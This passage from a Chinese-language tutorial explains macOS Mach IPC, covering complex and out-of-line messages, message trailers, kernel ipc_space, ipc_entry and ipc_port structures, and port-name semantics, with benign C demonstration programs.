    mach_msg_trailer_t trailer;
} mach_msg_complex_receive_t;

void sender()
{
    // 等待一小会，让 receiver 注册一下 bootstrap
    usleep(100);
    // 从 bootstrap 中查询并获取一个 mach port
    mach_port_t port;
    kern_return_t kr = bootstrap_look_up(bootstrap_port, "io.github.kiprey", &port);
    assert(kr == KERN_SUCCESS);
    printf("[sender] bootstrap_look_up() returned port right name %d\n", port);

    // 构造待发送的信息
    mach_msg_complex_send_t send_msg;

    // 新建立一个 receiver 发送的 replyPort
    mach_port_t replyPort;
    kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &replyPort);
    assert(kr == KERN_SUCCESS);
    printf("[sender] mach_port_allocate() created port right name %d\n", replyPort);

    // 给该 port 再增加一个发送权限
    kr = mach_port_insert_right(mach_task_self(), replyPort, replyPort, MACH_MSG_TYPE_MAKE_SEND);
    assert(kr == KERN_SUCCESS);
    printf("[sender] mach_port_insert_right() inserted a send right\n");

    // 注意这里，要指定待发送的信息格式为 complex
    send_msg.header.msgh_bits           = MACH_MSGH_BITS_SET(MACH_MSG_TYPE_COPY_SEND, 0, 0, MACH_MSGH_BITS_COMPLEX);
    send_msg.header.msgh_remote_port    = port;
    send_msg.header.msgh_local_port     = MACH_PORT_NULL;
    send_msg.header.msgh_size           = sizeof(send_msg);
    // 指定只有一个描述符需要传递
    send_msg.msgh_descriptor_count      = 1;
    send_msg.descriptor.name            = replyPort;
    send_msg.descriptor.disposition     = MACH_MSG_TYPE_PORT_SEND;
    send_msg.descriptor.type            = MACH_MSG_PORT_DESCRIPTOR;

    // 将其发送
    mach_msg_return_t mr = mach_msg_send(&send_msg.header);
    assert(mr == KERN_SUCCESS);
    printf("[sender] Message is sent.\n");

    // 等待 message
    mach_msg_simple_receive_t recv_msg;
    recv_msg.recv_content.header.msgh_size          = sizeof(recv_msg);
    recv_msg.recv_content.header.msgh_local_port    = replyPort;
    kr = mach_msg_receive(&recv_msg.recv_content.header);
    assert(kr == KERN_SUCCESS);
    printf("[sender] Got a Message\n");
    printf("[sender] Text: %s | number: %d\n", recv_msg.recv_content.texts, recv_msg.recv_content.integer);
}

void receiver()
{
    // 创建一个带有接收权限的 mach port
    mach_port_t port;
    kern_return_t kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
    assert(kr == KERN_SUCCESS);
    printf("[receiver] mach_port_allocate() created port right name %d\n", port);

    // 给该 port 再增加一个发送权限
    kr = mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);
    assert(kr == KERN_SUCCESS);
    printf("[receiver] mach_port_insert_right() inserted a send right\n");

    // 将该端口的 send right 发送给 bootstrap，这样就可以被其他进程所查询
    kr = bootstrap_register(bootstrap_port, "io.github.kiprey", port);
    assert(kr == KERN_SUCCESS);
    printf("[receiver] bootstrap_register()'ed our port\n");

    // 等待 message
    mach_msg_complex_receive_t recv_msg;
    recv_msg.recv_content.header.msgh_size          = sizeof(recv_msg);
    recv_msg.recv_content.header.msgh_local_port    = port;
    kr = mach_msg_receive(&recv_msg.recv_content.header);
    assert(kr == KERN_SUCCESS);
    assert(recv_msg.recv_content.msgh_descriptor_count == 1);
    printf("[receiver] Got a Message\n");
    printf("[receiver] remote_port: %d\n", recv_msg.recv_content.descriptor.name);

    mach_msg_simple_send_t send_msg;
    strcpy(send_msg.texts, "Hello, I'm receiver.");
    send_msg.integer = 2;

    // 注意这里的发送权限是 MACH_MSG_TYPE_MAKE_SEND_ONCE
    send_msg.header.msgh_bits           = recv_msg.recv_content.descriptor.disposition;
    send_msg.header.msgh_remote_port    = recv_msg.recv_content.descriptor.name;
    send_msg.header.msgh_local_port     = MACH_PORT_NULL;
    send_msg.header.msgh_size           = sizeof(send_msg);

    // 将其发送
    mach_msg_return_t mr = mach_msg_send(&send_msg.header);
    assert(mr == KERN_SUCCESS);
    printf("[receiver] Message is sent.\n");
}

int main(int argc, const char *argv[])
{
    fork() ? sender() : receiver();
    return 0;
}

运行结果如下：

3. mach OOL 通信

当某个进程需要传递大量数据给对端时，simple message 中的内联数据已经无法满足我们的需求了（因为将数据拷贝进内联数据的开销是相当大的）。因此，我们可以试着使用 mach complex message 中的 OOL 描述符来传递内存页。

a. sender

首先，我们需要定义一下复杂 mach msg 的结构：

typedef struct
{
    mach_msg_header_t header;
    mach_msg_size_t msgh_descriptor_count;
    mach_msg_ool_descriptor_t descriptor;
} mach_msg_complex_send_t;

注意到消息体中的描述符为 mach_msg_ool_descriptor_t 类型。该类型的结构体定义如下：

typedef struct{
    void*                         address;
#if !defined(__LP64__)
    mach_msg_size_t               size;
#endif
    boolean_t                     deallocate: 8;
    mach_msg_copy_options_t       copy: 8;
    unsigned int                  pad1: 8;
    mach_msg_descriptor_type_t    type: 8;
#if defined(__LP64__)
    mach_msg_size_t               size;
#endif
} mach_msg_ool_descriptor_t;

其中，

address 字段：存放待发送内存页面的基地址。
size 字段：待发送内存长度。
deallocate 字段：发送内存页面后，指定发送者是否需要隐式释放已发送的内存页面（例如自动调用 vm_deallocate），通常是 false。
这个字段可以将 内存复制 转换成 内存移动，即将发送方的内存页移动到接收方的进程中，内存处理效率更高。
copy 字段：指定内核以什么方式来复制发送过来的内存页面。共有两种方式：
- MACH_MSG_VIRTUAL_COPY：允许内核选择任何机制来传输数据。通常内核会先复制虚拟页面，共享物理页面，直到实际写入操作的发生再来进行数据复制操作，即写时复制。
- MACH_MSG_PHYSICAL_COPY：内核会实际复制数据至新的物理页中。
type 字段：指定当前 descriptor 的类型，这里必须为 MACH_MSG_OOL_DESCRIPTOR

接下来，sender 需要创建一个虚拟页面，并在该页面上写入一些数据：

char *buf = NULL;
vm_size_t len = vm_page_size;
if (vm_allocate(mach_task_self(), (vm_address_t *)&buf, len,
                VM_PROT_READ | VM_PROT_WRITE) != KERN_SUCCESS)
    abort();
strcpy(buf, "This is a buf message from sender.");

然后设置 Message，并将其发送：

// 注意这里，要指定待发送的信息格式为 complex
send_msg.header.msgh_bits = MACH_MSGH_BITS_SET(MACH_MSG_TYPE_COPY_SEND, 0, 0, MACH_MSGH_BITS_COMPLEX);
send_msg.header.msgh_remote_port = port;
send_msg.header.msgh_local_port = MACH_PORT_NULL;
send_msg.header.msgh_size = sizeof(send_msg);

// 设置 OOL 描述符信息
send_msg.msgh_descriptor_count = 1;
send_msg.descriptor.address = buf;
send_msg.descriptor.copy = MACH_MSG_VIRTUAL_COPY;
send_msg.descriptor.deallocate = false;
send_msg.descriptor.size = len;
send_msg.descriptor.type = MACH_MSG_OOL_DESCRIPTOR;

b. receiver

当接收方接收这个 mach message 时，在接收方的地址空间中，内核将新分配一块内存用于存放接收到的数据。

原先有一个选项用于指定内核将接收到的数据覆盖至接收方指定的内存地址处（MACH_MSG_OVERWRITE），但这个选项已经被废弃。

c. 代码示例

以下是一个简单的代码示例，其中接收方使用 MACH_MSG_ALLOCATE 方式来接收数据：

#include 
#include 
#include 
#include 
#include 
#include 

typedef struct
{
    mach_msg_header_t header;
    mach_msg_size_t msgh_descriptor_count;
    mach_msg_ool_descriptor_t descriptor;
} mach_msg_complex_send_t;

typedef struct
{
    mach_msg_complex_send_t recv_content;
    mach_msg_trailer_t trailer;
} mach_msg_complex_receive_t;

void sender()
{
    // 等待一小会，让 receiver 注册一下 bootstrap
    usleep(1000);
    // 从 bootstrap 中查询并获取一个 mach port
    mach_port_t port;
    if (bootstrap_look_up(bootstrap_port, "io.github.kiprey", &port) != KERN_SUCCESS)
        abort();
    printf("[sender] bootstrap_look_up() returned port right name %d\n", port);

    // 构造待发送的信息
    mach_msg_complex_send_t send_msg;

    // 注意这里，要指定待发送的信息格式为 complex
    send_msg.header.msgh_bits = MACH_MSGH_BITS_SET(MACH_MSG_TYPE_COPY_SEND, 0, 0, MACH_MSGH_BITS_COMPLEX);
    send_msg.header.msgh_remote_port = port;
    send_msg.header.msgh_local_port = MACH_PORT_NULL;
    send_msg.header.msgh_size = sizeof(send_msg);
    // 指定待传递的地址
    char *buf = NULL;
    vm_size_t len = vm_page_size;
    if (vm_allocate(mach_task_self(), (vm_address_t *)&buf, len,
                    VM_PROT_READ | VM_PROT_WRITE) != KERN_SUCCESS)
        abort();
    strcpy(buf, "This is a buf message from sender.");

    send_msg.msgh_descriptor_count = 1;
    send_msg.descriptor.address = buf;
    send_msg.descriptor.copy = MACH_MSG_VIRTUAL_COPY;
    send_msg.descriptor.deallocate = false;
    send_msg.descriptor.size = len;
    send_msg.descriptor.type = MACH_MSG_OOL_DESCRIPTOR;

    // 将其发送
    if (mach_msg_send(&send_msg.header) != KERN_SUCCESS)
        abort();
    printf("[sender] Message is sent, buf address: %#p\n", buf);
}

void receiver()
{
    // 创建一个带有接收权限的 mach port
    mach_port_t port;
    if (mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port) != KERN_SUCCESS)
        abort();
    printf("[receiver] mach_port_allocate() created port right name %d\n", port);

    // 给该 port 再增加一个发送权限
    if (mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND) != KERN_SUCCESS)
        abort();
    printf("[receiver] mach_port_insert_right() inserted a send right\n");

    // 将该端口的 send right 发送给 bootstrap，这样就可以被其他进程所查询
    if (bootstrap_register(bootstrap_port, "io.github.kiprey", port) != KERN_SUCCESS)
        abort();
    printf("[receiver] bootstrap_register()'ed our port\n");

    // 等待 message
    mach_msg_complex_receive_t recv_msg;
    recv_msg.recv_content.header.msgh_size = sizeof(recv_msg);
    recv_msg.recv_content.header.msgh_local_port = port;
    if (mach_msg_receive(&recv_msg.recv_content.header) != KERN_SUCCESS)
        abort();
    assert(recv_msg.recv_content.msgh_descriptor_count == 1);

    char *buf = recv_msg.recv_content.descriptor.address;
    size_t len = recv_msg.recv_content.descriptor.size;
    printf("[receiver] Got a Message\n");
    printf("[receiver] recv buf address: %#p, len: %d, content: %s\n", buf, len, buf);
}

int main(int argc, const char *argv[])
{
    fork() ? sender() : receiver();
    return 0;
}

测试结果：

4. Message Trailer

接收方接收到的 Mach message 会包含一个 trailer 结构体。

typedef struct
{
    mach_msg_header_t header;
    char texts[0x20];
    int integer;
} mach_msg_send_t;

typedef struct
{
    mach_msg_send_t recv_content;
    mach_msg_trailer_t trailer;
} mach_msg_receive_t;

其中，mach_msg_trailer_t结构体中有如下几种字段：

typedef struct{
    mach_msg_trailer_type_t       msgh_trailer_type;
    mach_msg_trailer_size_t       msgh_trailer_size;
} mach_msg_trailer_t;

第一个字段表示 trailer 的类型，第二个字段表示接下来 trailer 的个数。

对于 trailer 类型来说，目前 Mac OSX 对用户层来说只提供了一种格式，即MACH_MSG_TRAILER_FORMAT_0：

1
2
3

typedef unsigned int mach_msg_trailer_type_t;

#define MACH_MSG_TRAILER_FORMAT_0       0

但是，该格式下有许多种 trailer 的类型，分别有：

mach_msg_trailer_t：一个空的 trailer，只包含了 type 和 size 字段。

mach_msg_seqno_trailer_t：在第1个结构体的内存布局基础之上，额外增添第3个字段

1
2
3

typedef natural_t mach_port_seqno_t;            /* sequence number */

mach_port_seqno_t             msgh_seqno;

sequence number，即消息序列号

mach_msg_security_trailer_t：在第2个结构体之上，额外增添第4个字段：

typedef struct{
 unsigned int                  val[2];
} security_token_t;

security_token_t              msgh_sender;

security token 的两个整数分别表示发送方的 UID 和 GID。

mach_msg_audit_trailer_t：在第3个结构体之上，额外增添第5个字段：

/*
 * The audit token is an opaque token which identifies
 * Mach tasks and senders of Mach messages as subjects
 * to the BSM audit system.  Only the appropriate BSM
 * library routines should be used to interpret the
 * contents of the audit token as the representation
 * of the subject identity within the token may change
 * over time.
 */
typedef struct{
 unsigned int                  val[8];
} audit_token_t;

audit_token_t                 msgh_audit;

audit token 中共有 8 个整型，该 token 需要使用其他处理例程来进行解释。

mach_msg_context_trailer_t：在第4个结构体之上，额外增添第6个字段
mach_msg_mac_trailer_t：在第5个结构体之上，额外增添第7个字段
mach_msg_max_trailer_t：在第6个结构体之上，额外增添第8个字段

可以看到，每一个 trailer 总是嵌套在下一个 trailer 之中，这有利于兼容。

接收者在接收 mach messag 时，必须显式指定 mach_msg 函数的 option 字段，以说明接收的 trailer 的类型为 FORMAT_0，同时指定接收 trailer 时终止接收的那个字段。请看下面这个例子：

// 等待 message
mach_msg_receive_t message;
mach_msg_option_t option = MACH_RCV_MSG 
    | MACH_RCV_TRAILER_TYPE(MACH_MSG_TRAILER_FORMAT_0) 
    | MACH_RCV_TRAILER_ELEMENTS(MACH_RCV_TRAILER_SENDER);
kr = mach_msg(&message.recv_content.header, option,
              0, sizeof(message), port,
              MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);

在这个例子中，option 设置了 MACH_RCV_TRAILER_ELEMENTS(MACH_RCV_TRAILER_SENDER)，这个操作是为了指定接收 mach_msg_security_trailer_t 类型的 trailer，因为该类型的最后一个字段为 sender。

#define MACH_RCV_TRAILER_NULL   0 // mach_msg_trailer_t 
#define MACH_RCV_TRAILER_SEQNO  1 // mach_msg_trailer_seqno_t 
#define MACH_RCV_TRAILER_SENDER 2 // mach_msg_security_trailer_t 
#define MACH_RCV_TRAILER_AUDIT  3 // mach_msg_audit_trailer_t

以下是一个简单的测试例子：

#include 
#include 
#include 
#include 
#include 
#include 

typedef struct
{
    mach_msg_header_t header;
    char texts[0x20];
    int integer;
} mach_msg_send_t;

typedef struct
{
    mach_msg_send_t recv_content;
    mach_msg_security_trailer_t trailer;
} mach_msg_receive_t;

void sender() {
    printf("[sender] Current UID(%d) GID(%d)\n", getuid(), getgid());
    usleep(1000);
    // 从 bootstrap 中查询并获取一个 mach port
    mach_port_t port;
    kern_return_t kr = bootstrap_look_up(bootstrap_port, "io.github.kiprey", &port);
    assert(kr == KERN_SUCCESS);
    printf("[sender] bootstrap_look_up() returned port right name %d\n", port);

    // 构造待发送的信息
    mach_msg_send_t message;

    message.header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0);
    message.header.msgh_remote_port = port;
    message.header.msgh_local_port = MACH_PORT_NULL;
    message.header.msgh_size = sizeof(message);

    strcpy(message.texts, "Hello, I'm sender");
    message.integer = 123;

    // 将其发送
    mach_msg_return_t mr = mach_msg_send(&message.header);
    assert(mr == KERN_SUCCESS);
    printf("[sender] Message is sent.\n");
}

void receiver() {
    // 创建一个带有接收权限的 mach port
    mach_port_t port;
    kern_return_t kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
    assert(kr == KERN_SUCCESS);
    printf("[receiver] mach_port_allocate() created port right name %d\n", port);
    
    // 给该 port 再增加一个发送权限
    kr = mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);
    assert (kr == KERN_SUCCESS);
    printf("[receiver] mach_port_insert_right() inserted a send right\n");

    // 将该端口的 send right 发送给 bootstrap，这样就可以被其他进程所查询
    kr = bootstrap_register(bootstrap_port, "io.github.kiprey", port);
    assert (kr == KERN_SUCCESS);
    printf("[receiver] bootstrap_register()'ed our port\n");

    // 等待 message
    mach_msg_receive_t message;
    mach_msg_option_t option = MACH_RCV_MSG 
                            | MACH_RCV_TRAILER_TYPE(MACH_MSG_TRAILER_FORMAT_0) 
                            | MACH_RCV_TRAILER_ELEMENTS(MACH_RCV_TRAILER_SENDER);
    kr = mach_msg(&message.recv_content.header, option,
            0, sizeof(message), port,
            MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);

    assert (kr == KERN_SUCCESS);
    printf("[receiver] Got a message\n");

    printf("[receiver] Text: %s, number: %d\n", message.recv_content.texts, message.recv_content.integer);
    printf("[receiver] Security token = UID(%u) GID(%u)\n", 
           message.trailer.msgh_sender.val[0],  // sender's user ID 
           message.trailer.msgh_sender.val[1]); // sender's group ID
}

int main(int argc, const char * argv[]) {
    fork() ? sender() : receiver();
    return 0;
}

测试结果：

六、部分内核类型介绍

1. ipc_space

对于 task 结构体中，其内部存在一个 struct ipc_space *itk_space 的字段，以存放当前 task 所使用的 IPC 信息，其结构体定义如下：

struct ipc_space {
    lck_spin_t    is_lock_data;
    ipc_space_refs_t is_bits;    /* holds refs, active, growing */
    ipc_entry_num_t is_table_size;    /* current size of table */
    ipc_entry_num_t is_table_free;    /* count of free elements */
    ipc_entry_t is_table;        /* an array of entries */
    task_t is_task;                 /* associated task */
    struct ipc_table_size *is_table_next; /* info for larger table */
    ipc_entry_num_t is_low_mod;    /* lowest modified entry during growth */
    ipc_entry_num_t is_high_mod;    /* highest modified entry during growth */
    struct bool_gen bool_gen;       /* state for boolean RNG */
    unsigned int is_entropy[IS_ENTROPY_CNT]; /* pool of entropy taken from RNG */
    int is_node_id;            /* HOST_LOCAL_NODE, or remote node if proxy space */
};

字段 is_table 指向一个元素类型为 struct ipc_entry 的数组，长度为 is_table_size，通常用户层使用的 mach port name （整型表示）将会映射到内核层的该结构体。is_table 在创建时就会存放一些初始条目。

字段 is_bits 包含了较多的控制信息，例如引用计数、当前 ipc_space 是否激活(active) 以及当前 ipc_space是否正在增大内存空间(growing)。其中 growing 位是为了防止条件竞争所设定的一个简单比特。内核使用 ipc_space 时，如果发现当前 ipc_space 的 is_table 大小不够，则会尝试进行 grow 操作；但如果当前内核线程发现当前 ipc_space 正在被其他内核线程 growing 时，则会先休眠(is_write_sleep)，直到其他线程完成处理后再来进行接下来的操作。

当某个 mach port 的 receive right 被释放了，则这个 mach port 便视为被释放了，若此时持有该 mach port 的引用为 0 ，则 is_table 中对应的 ipc_entry 结构体将被移动至 is_table_free 中，并且被释放的 mach port 的所有 right 都被更改为 MACH_PORT_RIGHT_DEAD_NAME，表示这些 right 全都 dead。

这种机制是为了，防止所接管的 port name 被过早的重用。

若当前的 ipc_space 需要创建一个新的 ipc_entry 时，首先 ipc_space 会尝试从 is_table_free 中取出最早被释放的 ipc_entry（即 is_table_free 为 FIFO）并重用；但若 is_table_free 为空，则将尝试 扩大（grow） ipc_space，并插入一个新的 ipc_entry 结构体。

需要注意的是，即便某个 mach port 的 receive right 已经被释放了，那么如果该 mach port 的引用不为 0 （此时 mach port 的各个 right 为 Dead name），则在下次分配 mach port 时，仍然不能重用该 mach port name。

2. ipc_entry

用户层的 mach port name（整数表示）实际上对应至内核中 task->ipc_space->is_table 上的某个 ipc_entry 条目。而 ipc_entry 结构声明如下：

struct ipc_entry {
    struct ipc_object *ie_object;
    ipc_entry_bits_t ie_bits;
    mach_port_index_t ie_index;
    union {
        mach_port_index_t next;        /* next in freelist, or...  */
        ipc_table_index_t request;    /* dead name request notify */
    } index;
};

其中 ie_object 指针字段，实际指向的结构体有两种：ipc_port、ipc_pset。

ie_bits 标志位字段保存了给定 port name 所代表的 right 类型。

3. ipc_port

ipc_port 结构体，对应于单个 mach port。该结构体记录了 Mach message 队列、mach port 的接收方和发送方 port、内核存储的相关数据等等。这些字段不一一解释，有用到再说。

struct ipc_port {

    /*
     * Initial sub-structure in common with ipc_pset
     * First element is an ipc_object second is a
     * message queue
     */
    struct ipc_object ip_object;
    struct ipc_mqueue ip_messages;

    union {
        struct ipc_space *receiver;
        struct ipc_port *destination;
        ipc_port_timestamp_t timestamp;
    } data;

    union {
        ipc_kobject_t kobject;
        ipc_importance_task_t imp_task;
        ipc_port_t sync_qos_override_port;
    } kdata;
        
    struct ipc_port *ip_nsrequest;
    struct ipc_port *ip_pdrequest;
    struct ipc_port_request *ip_requests;
    union {
        struct ipc_kmsg *premsg;
        struct {
            sync_qos_count_t sync_qos[THREAD_QOS_LAST];
            sync_qos_count_t special_port_qos;
        } qos_counter;
    } kdata2;

    mach_vm_address_t ip_context;

    natural_t ip_sprequests:1,    /* send-possible requests outstanding */
          ip_spimportant:1,    /* ... at least one is importance donating */
          ip_impdonation:1,    /* port supports importance donation */
          ip_tempowner:1,    /* dont give donations to current receiver */
          ip_guarded:1,         /* port guarded (use context value as guard) */
          ip_strict_guard:1,    /* Strict guarding; Prevents user manipulation of context values directly */
          ip_specialreply:1,    /* port is a special reply port */
          ip_link_sync_qos:1,    /* link the special reply port to destination port */
          ip_impcount:24;    /* number of importance donations in nested queue */

    mach_port_mscount_t ip_mscount;
    mach_port_rights_t ip_srights;
    mach_port_rights_t ip_sorights;

#if MACH_ASSERT
#define IP_NSPARES  4
#define IP_CALLSTACK_MAX    16
/*  queue_chain_t   ip_port_links;*//* all allocated ports */
    thread_t    ip_thread;  /* who made me?  thread context */
    unsigned long   ip_timetrack;   /* give an idea of "when" created */
    uintptr_t   ip_callstack[IP_CALLSTACK_MAX]; /* stack trace */
    unsigned long   ip_spares[IP_NSPARES]; /* for debugging */
#endif  /* MACH_ASSERT */
};

4. ipc_pset

ipc_pset 结构体，对应于多个 mach port 的集合。以下是其声明：

struct ipc_pset {

    /*
     * Initial sub-structure in common with all ipc_objects.
     */
    struct ipc_object    ips_object;
    struct ipc_mqueue    ips_messages;
};

注意到上面这两个结构体的第一个字段都是 struct ipc_object 字段。
因此当 ipc_entry 中的 ie_object 指针指向这两个结构体中的 ipc_object 结构体字段时，这种指向关系也等价于直接指向这两个结构体的基地址。

5. mach_port_t 与 mach_port_name_t

注：这一节较为重要。

在用户层调用 mach API 时，我们经常会看到 mach_port_t 与 mach_port_name_t 类型，并很容易将这些类型混淆（至少我学 mach 的时候经常混）。

引起混淆的原因很简单

用户层输出这两个类型的值都是同一个整型数值
使用某些 mach API 时，经常将 mach_port_t 类型的值直接作为 mach_port_name_t 类型的函数参数。
被一些函数声明给混淆了。明明是mach_port_t类型的参数，偏偏参数名为 name。

虽然这两个类型在用户层中表示的值是相同的，但实际上在内核里有着非常明显的不同。

对于端口名称 (port name, aka mach_port_name_t) 来说，port name 只是表示特定于某个 task 的 port，并且不携带任何关于该 port 的 right 相关信息。
而对于端口 (port, aka mach_port_t) 来说，它表示的是可以添加或删除某些端口权限的一个引用。当内核返回这样的一个引用给用户层时，用户层所获取到的是这个引用的 name，即 port name。这就是为什么用户层中，内核返回的 mach_port_name_t 和 mach_port_t 类型的变量都是同一个整型值。
正常来说，对于某个 mach port 来说，引用不同 right 的 name 是互不相同的。但也有例外，下文中有说明。
但需要注意的是，mach_port_t 类型在内核中，确确实实映射了一个 ipc_port 类型的结构体，其中该结构体内含 port right 的相关数据。但 mach_port_name_t 只是 mach port 的一个整数表示形式，没有映射任何 ipc_port 类型的结构体，因此就没有关于该 mach port 的 right 信息。

同时还有一点需要注意：对于某一个特定 mach port（即引用了相同的 ipc_port 结构体），如果该端口有多个 right，例如同时拥有 send right 和 receiver right。那么这些 right 的 name 将合并成一个 name，即一个 name 可以同时代表目标 mach port 的 send right 和 receiver right。但是，send once right 所对应的 name 总是唯一的命令，即总是会有一个独立的 name 来指代这个 mach port 的 send right。

当这两个类型被很好的区分开后，mach_port_t、mach_port_name_t、mach port right 以及 mach port 之间的关系就能很好的区分开了，对理解 mach IPC 有着非常多的帮助。这里先完整概括一下 port、right 以及 name 之间的关系：

我们常常说的 mach port，指代的是内核中的 ipc_port 结构体，我们可以向这个 mach port 发送信息以及接收信息。
一个 mach port 在一些 task 中可能存在一些 rights，这些 rights 指定了当前 task 对该 mach port 的一些权限，例如接收信息，发送信息权限等等。这些在当前 task 中存在权限的 mach port ，一定在当前 task 的 ipc_space 中存在一个 ipc_port 结构体。
因此，mach_port_t 类型在内核（注意不是用户层）中就指代了一个在当前 task 中的 mach port 的一个 right 引用。
注意 mach_port_t 类型在内核中不是直接代表一个 mach port，是不是觉得很绕？
而 mach_port_name_t 类型在内核层和用户层中只是表示了一个 mach port，并没有涉及任何 right，也就更别说是 right 的引用了。
当内核返回给用户层一个 mach_port_t 类型引用时，与内核不同，这里用户层接收到的值的实质是对应该 right 的 name。即在用户层中， mach_port_t 类型的值表示的是对某个 mach port 对应的 right 的 name（注意此时并非直接引用 right）。因此 mach_port_t 类型的值和 mach_port_name_t 类型的值会是相同的。
承接刚刚说的，正常来讲一个 mach_port_t 类型的值在用户层中会是某个 mach port 中一个 right 的 name。
但是，如果某个 mach_port_t 已经表示了某个 mach port 的 send right name，那么当用户请求一个表示了某个 mach port 的 receive right name（注意两个 right 是不同类型的）。那么这次请求将重用之前的 send right name，也就是说最后这个 port 既表示 send right name 又表示 receive right name。
这种机制称为名称合并，即不同类型的 right 的 name 将可以合并为一个 name ，并指定多个 right。但需要注意的是 send-once right name无法被合并。
例如两个 mach_port_t 类型分别表示引用某个 mach port 的 send right 和 send-once right 的 name，那么此时这两个 mach_port_t 类型的变量将是不同值。

七、部分 IPC 基础 API

1. User Mode

a. mach_port_names

作用：返回指定 task 相关的 port namespace 信息。

函数定义如下：

kern_return_t   mach_port_names
                (ipc_space_t                               task,
                 mach_port_name_array_t                  *names,
                 mach_msg_type_number_t               *namesCnt,
                 mach_port_type_array_                   *types,
                 mach_msg_type_number_t               *typesCnt);

其中，

task：待查阅的 task port，查阅者必须拥有目标 task 的 mach port send right。
names：存放查询结果的 mach_port_name_t 数组
namesCnt：names 数组中的元素个数
types：存放对于 names 数组中每个对应 name 的 right 类型的数组。
typesCnt：types 数组中的元素个数。

可以肯定的是，namesCnt 应该等于 typesCnt。

而这个接口返回两个单独的 Cnt 是因为这是 Mach Interface Generator 的产物。‘

需要注意的是，names 和 types 的缓冲区将会被自动创建，因此在使用完成后需要及时调用 vm_deallocate 释放。

b. mach_port_get_attributes

作用：查询指定 port 的相关信息。

函数定义：

kern_return_t   mach_port_get_attributes
                (ipc_space_t                               task,
                 mach_port_name_t                          name,
                 mach_port_flavor_t                      flavor,
                 mach_port_info_t                     port_info,
                 mach_msg_type_number_t        *port_info_count);

其中，参数说明如下：

task：持有待查询 port 的 task
name：待查询 port 的 name
flavor：所查询的信息类型
查询的信息类型有两种，分别是：
- MACH_PORT_LIMITS_INFO：返回端口的资源限制（mach_port_limits）
- MACH_PORT_RECEIVE_STATUS：随机返回与端口相关的 right 和 message 的信息（mach_port_status）
port_info：一个指向存放查询结果的缓冲区的指针
port_info_count：缓冲区最大可存放结果的数量。函数返回时该值将会被修改为实际返回的查询结果个数。

以下是组合使用上面两个函数的一个简单示例：

#include 
#include 
#include 

#define EXIT_ON_MACH_ERROR(msg, retval) \
    if (kr != KERN_SUCCESS)   { mach_error(msg ":", kr); exit((retval)); }

void print_mach_port_type(mach_port_type_t type)
{
    if (type & MACH_PORT_TYPE_SEND)         printf("SEND ");
    if (type & MACH_PORT_TYPE_RECEIVE)      printf("RECEIVE ");
    if (type & MACH_PORT_TYPE_SEND_ONCE)    printf("SEND_ONCE ");
    if (type & MACH_PORT_TYPE_PORT_SET)     printf("PORT_SET ");
    if (type & MACH_PORT_TYPE_DEAD_NAME)    printf("DEAD_NAME ");
    if (type & MACH_PORT_TYPE_DNREQUEST)    printf("DNREQUEST ");
    printf("\n");
}

int main(int argc, char **argv)
{
    int i;
    pid_t pid;
    kern_return_t kr;
    mach_port_name_array_t names;
    mach_port_type_array_t types;
    mach_msg_type_number_t ncount, tcount;
    mach_port_limits_t port_limits;
    mach_port_status_t port_status;
    mach_msg_type_number_t port_info_count;
    task_t task;
    task_t mytask = mach_task_self();

    if (argc != 2)
    {
        fprintf(stderr, "usage: %s \n", argv[0]);
        exit(1);
    }

    pid = atoi(argv[1]);
    kr = task_for_pid(mytask, (int)pid, &task);
    EXIT_ON_MACH_ERROR("task_for_pid", kr);

    // retrieve a list of the rights present in the given task's IPC space,
    // along with type information (no particular ordering)
    kr = mach_port_names(task, &names, &ncount, &types, &tcount);
    EXIT_ON_MACH_ERROR("mach_port_names", kr);

    printf("%8s %8s %8s %8s %8s task rights\n",
           "name", "q-limit", "seqno", "msgcount", "sorights");
    for (i = 0; i < ncount; i++)
    {
        printf("%08x ", names[i]);

        // get resource limits for the port
        port_info_count = MACH_PORT_LIMITS_INFO_COUNT;
        kr = mach_port_get_attributes(
            task,                           // the IPC space in question
            names[i],                       // task's name for the port
            MACH_PORT_LIMITS_INFO,          // information flavor desired
            (mach_port_info_t)&port_limits, // outcoming information
            &port_info_count);              // size returned
        if (kr == KERN_SUCCESS)
            printf("%8d ", port_limits.mpl_qlimit);
        else
            printf("%8s ", "-");

        // get miscellaneous information about associated rights and messages
        port_info_count = MACH_PORT_RECEIVE_STATUS_COUNT;
        kr = mach_port_get_attributes(task, names[i], MACH_PORT_RECEIVE_STATUS,
                                      (mach_port_info_t)&port_status,
                                      &port_info_count);
        if (kr == KERN_SUCCESS)
        {
            printf("%8d %8d %8d ",
                   port_status.mps_seqno,     // current sequence # for the port
                   port_status.mps_msgcount,  // # of messages currently queued
                   port_status.mps_sorights); // # of send-once rights
        }
        else
            printf("%8s %8s %8s ", "-", "-", "-");
        print_mach_port_type(types[i]);
    }

    vm_deallocate(mytask, (vm_address_t)names, ncount * sizeof(mach_port_name_t));
    vm_deallocate(mytask, (vm_address_t)types, tcount * sizeof(mach_port_type_t));

    exit(0);
}

示例效果：

c. mach_port_request_notification

当某个 mach port 被销毁后，其他 task 所持有的 right 都将转变为 dead name，因此当发送信息时，发送者可以得知目标 mach port 被销毁。

但如果发送者希望目标 mach port 在被销毁时能立即通知发送者，而不是等到发送者发送数据时才得知，那么这就是 mach_port_request_notification 函数的作用。该函数指定目标 mach port 的事件请求通知。以下是该函数的声明：

kern_return_t   mach_port_request_notification
                (ipc_space_t                               task,
                 mach_port_name_t                          name,
                 mach_msg_id_t                          variant,
                 mach_port_mscount_t                       sync,
                 mach_port_send_once_t                   notify,
                 mach_msg_type_name_t               notify_type,
                 mach_port_send_once_t                *previous);

具体参数暂不说明，等实际应用到了再来补充。

2. Kernel Mode

a. ipc_entry_lookup

注：ipc_right_lookup_write 是该函数的 Wrapper；而 ipc_right_lookup_read 又是 ipc_right_lookup_write 的宏。

